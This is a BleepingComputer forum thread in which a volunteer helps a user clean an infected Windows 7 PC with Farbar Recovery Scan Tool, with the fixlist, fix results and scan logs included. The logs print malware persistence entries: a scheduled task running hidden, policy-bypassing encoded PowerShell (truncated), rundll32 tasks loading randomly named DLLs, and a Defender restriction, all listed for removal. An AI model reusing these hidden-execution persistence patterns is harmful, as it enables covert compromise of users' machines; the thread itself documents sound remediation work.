Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/02/2018 09:16:43 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/02/2018 08:35:04 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/02/2018 08:29:26 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.


System errors:
=============
Error: (03/18/2018 08:19:16 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
AFD
CSC
DfsC
discache
ElbyCDIO
MpFilter
NetBIOS
NetBT
nsiproxy
prilock
Psched
rdbss
spldr
tdx
vpcnfltr
vpcvmm
Wanarpv6
WfpLwf

Error: (03/18/2018 08:19:16 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Task Scheduler service depends on the Windows Event Log service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (03/18/2018 08:14:00 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
AFD
CSC
DfsC
discache
ElbyCDIO
MpFilter
NetBIOS
NetBT
nsiproxy
prilock
Psched
rdbss
spldr
tdx
vpcnfltr
vpcvmm
Wanarpv6
WfpLwf

Error: (03/18/2018 08:14:00 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Task Scheduler service depends on the Windows Event Log service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (03/02/2018 12:09:03 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
AFD
CSC
DfsC
discache
ElbyCDIO
MpFilter
NetBIOS
NetBT
nsiproxy
prilock
Psched
rdbss
spldr
tdx
vpcnfltr
vpcvmm
Wanarpv6
WfpLwf

Error: (03/02/2018 12:09:03 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Task Scheduler service depends on the Windows Event Log service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (03/02/2018 11:13:47 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1084" attempting to start the service WSearch with arguments "" in order to run the server:
{7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}

Error: (03/02/2018 11:13:47 AM) (Source: DCOM) (EventID: 10005) (User: )
Description: DCOM got error "1084" attempting to start the service WSearch with arguments "" in order to run the server:
{9E175B6D-F52A-11D8-B9A5-505054503030}


==================== Memory info ===========================

Processor: Intel® Core™ i7-4770K CPU @ 3.50GHz
Percentage of memory in use: 10%
Total physical RAM: 16321.73 MB
Available physical RAM: 14647.89 MB
Total Virtual: 32641.63 MB
Available Virtual: 31499 MB

==================== Drives ================================

Drive c: (Structure) (Fixed) (Total:238.37 GB) (Free:89.17 GB) NTFS
Drive d: (Entertainment) (Fixed) (Total:1863.01 GB) (Free:192.43 GB) NTFS

\\?\Volume{0a950ecd-376b-11e3-98f7-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 238.5 GB) (Disk ID: 37EB0193)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=238.4 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 1863 GB) (Disk ID: 37EB0198)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

 



BC AdBot (Login to Remove)

 


#2 nasdaq

nasdaq

  • Malware Response Team
  • 40,454 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:01:09 PM

Posted 19 March 2018 - 09:51 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the Windows key + r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.
Please copy the entire contents of the code box below to the a new file.
 
start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKLM-x32\...\Run: [] => [X]
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\RunOnce: [Report] => C:\AdwCleaner\AdwCleaner[C1].tx
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: F - F:\setup.exe
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: {6c4e0517-4ea1-11e3-8ffc-74d02b96086c} - H:\LaunchU3.exe -a
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: {d6896687-cb1f-11e3-a1c7-74d02b96086c} - H:\AutoRun.exe {D2D77DC2-8299-11D1-8949-444553540000} 5.2066.1.A14B04 PID_0083 {01D42BF0-ED08-463f-8A28-99EB6FEE962B}
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: {ec015733-b07d-11e7-9a6f-74d02b96086c} - I:\HiSuiteDownLoader.exe
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
S3 NvStreamNetworkSvc; "C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe" [X]
S2 NvStreamSvc; "C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe" [X]
S2 WsDrvInst; C:\Program Files (x86)\Wondershare\dr.fone toolkit for Android\Library\DriverInstaller\DriverInstall.exe [X]
S1 prilock; C:\Windows\System32\drivers\prilock.sys [122776 2018-02-08] ()
S3 ALSysIO; \??\C:\Users\Martin\AppData\Local\Temp\ALSysIO64.sys [X] <==== ATTENTION
S1 gdgqdwdi; \??\C:\Windows\system32\drivers\gdgqdwdi.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
C:\Windows\System32\drivers\prilock.sys

Task: {6230731C-1C18-4CF1-A20D-7132A76583D3} - System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgACAAIAA7ACAAOwA7ADsAOwAgADsAIAAgACAAIAAgADsAIAA7ACAAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkA (the data entry has 10064 more characters). <==== ATTENTION
Task: {6230731C-1C18-4CF1-A20D-7132A76583D3} - System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179}
Task: {13AA3023-6A6A-479F-A0A0-0E803510CA59} - System32\Tasks\wXkHuguozQzssiw2 => rundll32 "C:\Program Files (x86)\GveoMZenU\AmeWky.dll",#1
Task: {584F7B10-0278-459B-8253-A225517D91AF} - System32\Tasks\OHurYzwpfZsLsh => rundll32 "C:\Program Files (x86)\pBsTWTvYOXtU2\oAhmxetWBkkyl.dll",#1
Task: {AB73D322-7316-4971-BE0D-4CA5E8D9C1DC} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2015-05-21] ()
Task: {B22B3AE9-EA76-4331-A232-E8A08C28BF26} - System32\Tasks\VTsFYYvpoVEusFPoU2 => rundll32 "C:\Program Files (x86)\eDQUsUcxIryKmPtCCUR\JSkkqWG.dll",#1
Task: {BB369166-0B23-49CC-9856-AE0991891F5A} - System32\Tasks\oWotDXBujaUxMpNAqmS2 => rundll32 "C:\Program Files (x86)\zKUGIuVeiGvyC\fuIpEbs.dll",#1
AlternateDataStreams: C:\Windows:E34B0F9ED3964806 [50]
AlternateDataStreams: C:\Users\Martin:Heroes & Generals [38]

C:\Windows\System32System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179}
C:\Windows\System32\Tasks\wXkHuguozQzssiw2
C:\Program Files (x86)\GveoMZenU
C:\Windows\System32\Tasks\OHurYzwpfZsLsh
C:\Program Files (x86)\pBsTWTvYOXtU2
C:\Windows\System32\Tasks\AutoKMS
C:\Windows\AutoKMS
C:\Windows\System32\Tasks\VTsFYYvpoVEusFPoU2
C:\Program Files (x86)\eDQUsUcxIryKmPtCCUR
C:\Windows\System32\Tasks\oWotDXBujaUxMpNAqmS2
C:\Program Files (x86)\zKUGIuVeiGvyC
C:\Program Files\K3QPCMS68Z

2018-03-02 12:09 - 2018-03-02 12:09 - 000345720 _____ C:\Windows\Minidump\030218-7519-01.dmp
2018-03-02 11:13 - 2018-03-02 11:13 - 000406768 _____ C:\Windows\Minidump\030218-8314-01.dmp
2018-03-02 10:22 - 2018-03-02 10:22 - 000407760 _____ C:\Windows\Minidump\030218-8564-01.dmp
2018-03-02 08:33 - 2018-03-02 08:33 - 000272600 _____ C:\Windows\Minidump\030218-7675-01.dmp
2018-03-02 08:12 - 2018-03-02 08:12 - 000404320 _____ C:\Windows\Minidump\030218-10608-01.dmp
2018-03-02 07:45 - 2018-03-02 07:45 - 000272600 _____ C:\Windows\Minidump\030218-7129-01.dmp
2018-03-01 17:26 - 2018-03-02 12:09 - 590156355 _____ C:\Windows\MEMORY.DMP
2018-03-01 17:26 - 2018-03-01 17:26 - 000407952 _____ C:\Windows\Minidump\030118-7472-01.dmp
2018-03-01 17:09 - 2018-03-02 08:00 - 000000000 ____D C:\Users\Martin\AppData\Roaming\LookUpPro
2018-03-01 17:09 - 2018-03-01 17:23 - 000000000 ____D C:\ProgramData\616ca8e3-9bd6-4a32-a4f3-3640822a6c06
2018-03-01 17:09 - 2018-03-01 17:09 - 000024450 _____ C:\Windows\System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179}
2018-03-01 17:08 - 2018-03-01 17:23 - 000000000 ____D C:\Program Files (x86)\One
2018-03-01 17:08 - 2018-03-01 17:14 - 000000000 ____D C:\Users\Martin\AppData\Roaming\eiab2yplwq4
2018-03-01 17:08 - 2018-03-01 17:08 - 000140800 _____ C:\Users\Martin\AppData\Local\installer.dat
2018-03-01 11:52 - 2018-03-01 11:52 - 000041224 _____ C:\Windows\uninstaller.dat

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

If the computer has restarted in Normal Mode run Malwarebytes.

Run the Farbar program and post fresh logs.
Make sure you mark the button to create a new Addition.txt file.

Let me knmow what problem persists.

#3 mortn

mortn
  • Topic Starter

  • Members
  • 16 posts
  • OFFLINE
  •  
  • Local time:08:09 PM

Posted 19 March 2018 - 11:07 AM

Hello, and thank you for taking the time to help me. It is very appreciated.

 

I ran the fix-list in fail-safe mode. After that, the computer started in normal mode WITHOUT going black after a few seconds. It appears that it did not load the usual auto-run programs, but other than that, nothing seemed off. I was, however, unable to start Malwarebytes Anti-Malware. I got a prompt saying "Unable to connect the Service" (see attached screenshot).

 

After that, I started FRST. I got another prompt, saying "Failed to update(1)" (see attached screenshot). The program did start though, and I was able to run the scan.

 

Due the the events described below, I will only be able to show the fixlog and the two frst-logs.

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 14.03.2018
Ran by Martin (19-03-2018 16:50:55) Run:1
Running from D:\User profile\Desktop
Loaded Profiles: Martin (Available Profiles: Martin)
Boot Mode: Safe Mode (minimal)
==============================================

fixlist content:
*****************
start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKLM-x32\...\Run: [] => [X]
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\RunOnce: [Report] => C:\AdwCleaner\AdwCleaner[C1].tx
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: F - F:\setup.exe
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: {6c4e0517-4ea1-11e3-8ffc-74d02b96086c} - H:\LaunchU3.exe -a
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: {d6896687-cb1f-11e3-a1c7-74d02b96086c} - H:\AutoRun.exe {D2D77DC2-8299-11D1-8949-444553540000} 5.2066.1.A14B04 PID_0083 {01D42BF0-ED08-463f-8A28-99EB6FEE962B}
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\MountPoints2: {ec015733-b07d-11e7-9a6f-74d02b96086c} - I:\HiSuiteDownLoader.exe
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
S3 NvStreamNetworkSvc; "C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe" [X]
S2 NvStreamSvc; "C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe" [X]
S2 WsDrvInst; C:\Program Files (x86)\Wondershare\dr.fone toolkit for Android\Library\DriverInstaller\DriverInstall.exe [X]
S1 prilock; C:\Windows\System32\drivers\prilock.sys [122776 2018-02-08] ()
S3 ALSysIO; \??\C:\Users\Martin\AppData\Local\Temp\ALSysIO64.sys [X] <==== ATTENTION
S1 gdgqdwdi; \??\C:\Windows\system32\drivers\gdgqdwdi.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
C:\Windows\System32\drivers\prilock.sys

Task: {6230731C-1C18-4CF1-A20D-7132A76583D3} - System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgACAAIAA7ACAAOwA7ADsAOwAgADsAIAAgACAAIAAgADsAIAA7ACAAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkA (the data entry has 10064 more characters). <==== ATTENTION
Task: {6230731C-1C18-4CF1-A20D-7132A76583D3} - System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179}
Task: {13AA3023-6A6A-479F-A0A0-0E803510CA59} - System32\Tasks\wXkHuguozQzssiw2 => rundll32 "C:\Program Files (x86)\GveoMZenU\AmeWky.dll",#1
Task: {584F7B10-0278-459B-8253-A225517D91AF} - System32\Tasks\OHurYzwpfZsLsh => rundll32 "C:\Program Files (x86)\pBsTWTvYOXtU2\oAhmxetWBkkyl.dll",#1
Task: {AB73D322-7316-4971-BE0D-4CA5E8D9C1DC} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2015-05-21] ()
Task: {B22B3AE9-EA76-4331-A232-E8A08C28BF26} - System32\Tasks\VTsFYYvpoVEusFPoU2 => rundll32 "C:\Program Files (x86)\eDQUsUcxIryKmPtCCUR\JSkkqWG.dll",#1
Task: {BB369166-0B23-49CC-9856-AE0991891F5A} - System32\Tasks\oWotDXBujaUxMpNAqmS2 => rundll32 "C:\Program Files (x86)\zKUGIuVeiGvyC\fuIpEbs.dll",#1
AlternateDataStreams: C:\Windows:E34B0F9ED3964806 [50]
AlternateDataStreams: C:\Users\Martin:Heroes & Generals [38]

C:\Windows\System32System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179}
C:\Windows\System32\Tasks\wXkHuguozQzssiw2
C:\Program Files (x86)\GveoMZenU
C:\Windows\System32\Tasks\OHurYzwpfZsLsh
C:\Program Files (x86)\pBsTWTvYOXtU2
C:\Windows\System32\Tasks\AutoKMS
C:\Windows\AutoKMS
C:\Windows\System32\Tasks\VTsFYYvpoVEusFPoU2
C:\Program Files (x86)\eDQUsUcxIryKmPtCCUR
C:\Windows\System32\Tasks\oWotDXBujaUxMpNAqmS2
C:\Program Files (x86)\zKUGIuVeiGvyC
C:\Program Files\K3QPCMS68Z

2018-03-02 12:09 - 2018-03-02 12:09 - 000345720 _____ C:\Windows\Minidump\030218-7519-01.dmp
2018-03-02 11:13 - 2018-03-02 11:13 - 000406768 _____ C:\Windows\Minidump\030218-8314-01.dmp
2018-03-02 10:22 - 2018-03-02 10:22 - 000407760 _____ C:\Windows\Minidump\030218-8564-01.dmp
2018-03-02 08:33 - 2018-03-02 08:33 - 000272600 _____ C:\Windows\Minidump\030218-7675-01.dmp
2018-03-02 08:12 - 2018-03-02 08:12 - 000404320 _____ C:\Windows\Minidump\030218-10608-01.dmp
2018-03-02 07:45 - 2018-03-02 07:45 - 000272600 _____ C:\Windows\Minidump\030218-7129-01.dmp
2018-03-01 17:26 - 2018-03-02 12:09 - 590156355 _____ C:\Windows\MEMORY.DMP
2018-03-01 17:26 - 2018-03-01 17:26 - 000407952 _____ C:\Windows\Minidump\030118-7472-01.dmp
2018-03-01 17:09 - 2018-03-02 08:00 - 000000000 ____D C:\Users\Martin\AppData\Roaming\LookUpPro
2018-03-01 17:09 - 2018-03-01 17:23 - 000000000 ____D C:\ProgramData\616ca8e3-9bd6-4a32-a4f3-3640822a6c06
2018-03-01 17:09 - 2018-03-01 17:09 - 000024450 _____ C:\Windows\System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179}
2018-03-01 17:08 - 2018-03-01 17:23 - 000000000 ____D C:\Program Files (x86)\One
2018-03-01 17:08 - 2018-03-01 17:14 - 000000000 ____D C:\Users\Martin\AppData\Roaming\eiab2yplwq4
2018-03-01 17:08 - 2018-03-01 17:08 - 000140800 _____ C:\Users\Martin\AppData\Local\installer.dat
2018-03-01 11:52 - 2018-03-01 11:52 - 000041224 _____ C:\Windows\uninstaller.dat

End
*****************

Error: Restore point can only be created in normal mode.
Processes closed successfully.
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\" => removed successfully
"HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\SDWinLogon" => removed successfully
"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" => removed successfully
"HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\\Report" => removed successfully
"HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F" => removed successfully
"HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{6c4e0517-4ea1-11e3-8ffc-74d02b96086c}" => removed successfully
HKLM\Software\Classes\CLSID\{6c4e0517-4ea1-11e3-8ffc-74d02b96086c} => not found
"HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d6896687-cb1f-11e3-a1c7-74d02b96086c}" => removed successfully
HKLM\Software\Classes\CLSID\{d6896687-cb1f-11e3-a1c7-74d02b96086c} => not found
"HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ec015733-b07d-11e7-9a6f-74d02b96086c}" => removed successfully
HKLM\Software\Classes\CLSID\{ec015733-b07d-11e7-9a6f-74d02b96086c} => not found
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => removed successfully
"HKLM\System\CurrentControlSet\Services\NvStreamNetworkSvc" => removed successfully
NvStreamNetworkSvc => service removed successfully
"HKLM\System\CurrentControlSet\Services\NvStreamSvc" => removed successfully
NvStreamSvc => service removed successfully
"HKLM\System\CurrentControlSet\Services\WsDrvInst" => removed successfully
WsDrvInst => service removed successfully
"HKLM\System\CurrentControlSet\Services\prilock" => removed successfully
prilock => service removed successfully
"HKLM\System\CurrentControlSet\Services\ALSysIO" => removed successfully
ALSysIO => service removed successfully
"HKLM\System\CurrentControlSet\Services\gdgqdwdi" => removed successfully
gdgqdwdi => service removed successfully
"HKLM\System\CurrentControlSet\Services\VGPU" => removed successfully
VGPU => service removed successfully
C:\Windows\System32\drivers\prilock.sys => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6230731C-1C18-4CF1-A20D-7132A76583D3}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6230731C-1C18-4CF1-A20D-7132A76583D3}" => removed successfully
C:\Windows\System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7F050547-040E-7E04-7811-0A0B797E1179}" => removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6230731C-1C18-4CF1-A20D-7132A76583D3} => could not remove. Access Denied.
"C:\Windows\System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179}" => not found
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7F050547-040E-7E04-7811-0A0B797E1179} => could not remove. Access Denied.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{13AA3023-6A6A-479F-A0A0-0E803510CA59}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{13AA3023-6A6A-479F-A0A0-0E803510CA59}" => removed successfully
C:\Windows\System32\Tasks\wXkHuguozQzssiw2 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\wXkHuguozQzssiw2" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{584F7B10-0278-459B-8253-A225517D91AF}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{584F7B10-0278-459B-8253-A225517D91AF}" => removed successfully
C:\Windows\System32\Tasks\OHurYzwpfZsLsh => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\OHurYzwpfZsLsh" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{AB73D322-7316-4971-BE0D-4CA5E8D9C1DC}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AB73D322-7316-4971-BE0D-4CA5E8D9C1DC}" => removed successfully
C:\Windows\System32\Tasks\AutoKMS => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoKMS" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B22B3AE9-EA76-4331-A232-E8A08C28BF26}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B22B3AE9-EA76-4331-A232-E8A08C28BF26}" => removed successfully
C:\Windows\System32\Tasks\VTsFYYvpoVEusFPoU2 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\VTsFYYvpoVEusFPoU2" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{BB369166-0B23-49CC-9856-AE0991891F5A}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BB369166-0B23-49CC-9856-AE0991891F5A}" => removed successfully
C:\Windows\System32\Tasks\oWotDXBujaUxMpNAqmS2 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\oWotDXBujaUxMpNAqmS2" => removed successfully
C:\Windows => ":E34B0F9ED3964806" ADS removed successfully
C:\Users\Martin => ":Heroes & Generals" ADS removed successfully
"C:\Windows\System32System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179}" => not found
"C:\Windows\System32\Tasks\wXkHuguozQzssiw2" => not found
"C:\Program Files (x86)\GveoMZenU" => not found
"C:\Windows\System32\Tasks\OHurYzwpfZsLsh" => not found
"C:\Program Files (x86)\pBsTWTvYOXtU2" => not found
"C:\Windows\System32\Tasks\AutoKMS" => not found
C:\Windows\AutoKMS => moved successfully
"C:\Windows\System32\Tasks\VTsFYYvpoVEusFPoU2" => not found
"C:\Program Files (x86)\eDQUsUcxIryKmPtCCUR" => not found
"C:\Windows\System32\Tasks\oWotDXBujaUxMpNAqmS2" => not found
"C:\Program Files (x86)\zKUGIuVeiGvyC" => not found
C:\Program Files\K3QPCMS68Z => moved successfully
C:\Windows\Minidump\030218-7519-01.dmp => moved successfully
C:\Windows\Minidump\030218-8314-01.dmp => moved successfully
C:\Windows\Minidump\030218-8564-01.dmp => moved successfully
C:\Windows\Minidump\030218-7675-01.dmp => moved successfully
C:\Windows\Minidump\030218-10608-01.dmp => moved successfully
C:\Windows\Minidump\030218-7129-01.dmp => moved successfully
C:\Windows\MEMORY.DMP => moved successfully
C:\Windows\Minidump\030118-7472-01.dmp => moved successfully
C:\Users\Martin\AppData\Roaming\LookUpPro => moved successfully
C:\ProgramData\616ca8e3-9bd6-4a32-a4f3-3640822a6c06 => moved successfully
"C:\Windows\System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179}" => not found
C:\Program Files (x86)\One => moved successfully
C:\Users\Martin\AppData\Roaming\eiab2yplwq4 => moved successfully
C:\Users\Martin\AppData\Local\installer.dat => moved successfully
C:\Windows\uninstaller.dat => moved successfully

=========== EmptyTemp: ==========

BITS transfer queue => 12582912 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 17848217 B
Java, Flash, Steam htmlcache => 683386996 B
Windows/system/drivers => 22004 B
Edge => 0 B
Chrome => 48358772 B
Firefox => 423622595 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 58558475 B
systemprofile32 => 66356 B
LocalService => 66228 B
NetworkService => 4314722 B
Martin => 4475750 B
UpdatusUser => 0 B

RecycleBin => 0 B
EmptyTemp: => 1.2 GB temporary data Removed.

================================

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 19-03-2018 16:51:43)


Result of scheduled keys to remove after reboot:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6230731C-1C18-4CF1-A20D-7132A76583D3} => could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7F050547-040E-7E04-7811-0A0B797E1179} => could not remove. Access Denied.

==== End of Fixlog 16:51:43 ====

 

 

 

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14.03.2018
Ran by Martin (administrator) on OVERLORD (19-03-2018 16:59:13)
Running from D:\User profile\Desktop
Loaded Profiles: Martin (Available Profiles: Martin)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
() C:\Windows\SysWOW64\PnkBstrB.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\..\Interfaces\{458E592A-DE20-42E8-8C67-65C88F2A797D}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
